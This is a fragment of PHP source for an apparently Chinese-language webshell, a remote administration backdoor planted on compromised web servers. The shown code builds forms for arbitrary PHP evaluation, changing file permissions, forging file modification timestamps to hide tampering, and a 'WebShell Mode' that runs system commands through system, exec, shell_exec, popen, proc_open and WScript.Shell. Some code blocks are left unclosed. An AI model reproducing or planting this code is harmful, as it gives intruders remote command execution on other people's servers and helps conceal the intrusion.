$tb->makehidden('oldname',$dir."/".$nowfile); 
$tb->makehidden('dir',$dir); 
$tb->tdbody('当前文件名: '.basename($nowfile)); 
$tb->tdbody('改名为: '.$tb->makeinput('newname')); 
$tb->makehidden('do','rename'); 
$tb->formfooter('1','30'); 
}//end rename 

elseif ($_GET['action'] == "eval") { 
$action = "?dir=".urlencode($dir).""; 
$tb->tableheader(); 
$tb->formheader(''.$action.' "target="_blank' ,'执行php脚本'); 
$tb->tdbody($tb->maketextarea('phpcode',$contents)); 
$tb->formfooter('1','30'); 


elseif ($_GET['action'] == "fileperm") { 
$action = "?dir=".urlencode($dir)."&file=".$file; 
$tb->tableheader(); 
$tb->formheader($action,'修改文件属性'); 
$tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4))); 
$tb->makehidden('file',$file); 
$tb->makehidden('dir',urlencode($dir)); 
$tb->makehidden('do','editfileperm'); 
$tb->formfooter('1','30'); 
}//end fileperm 

elseif ($_GET['action'] == "newtime") { 
$action = "?dir=".urlencode($dir); 
$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader(); 
$tb->formheader($action,'克隆文件最后修改时间'); 
$tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30'); 
$tb->makehidden('do','domodtime'); 
$tb->formfooter('','30'); 
$tb->formheader($action,'自定义文件最后修改时间'); 
$tb->tdbody('
  • 有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07
    (该日期根据 32 位有符号整数的最小值和最大值而来)
  • 说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!
','left'); 
$tb->tdbody('当前文件名: '.$file); 
$tb->makehidden('curfile',$file); 
$tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30'); 
$tb->makehidden('do','modmytime'); 
$tb->formfooter('1','30'); 
}//end newtime 

elseif ($_GET['action'] == "shell") { 
$action = "??action=shell&dir=".urlencode($dir); 
$tb->tableheader(); 
$tb->tdheader('WebShell Mode'); 
if (substr(PHP_OS, 0, 3) == 'WIN') { 
$program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32\cmd.exe"; 
$prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
echo "
\n"; 
$tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35'); 
$tb->makehidden('do','programrun'); 
echo "
\n"; 

echo "
\n"; 
if(isset($_POST['cmd'])) $cmd = $_POST['cmd']; 
$tb->tdbody('提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. '); 
$tb->tdbody('proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.'); 
$tb->tdbody('proc_open函数要使用的cmd程序的位置:'.$tb->makeinput('cmd',$cmd,'','text','30').'(要是是linux系统还是大大们自己修改吧)'); 
$execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); 
$tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); 
?>